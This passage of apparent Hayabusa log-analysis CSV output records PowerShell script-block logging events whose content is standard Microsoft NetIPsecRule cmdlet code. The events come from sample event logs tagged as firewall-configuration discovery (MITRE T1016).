$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) 
{ $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] 
[string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter 
-Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter 
-Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', 
Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description',",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values 
= @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) 
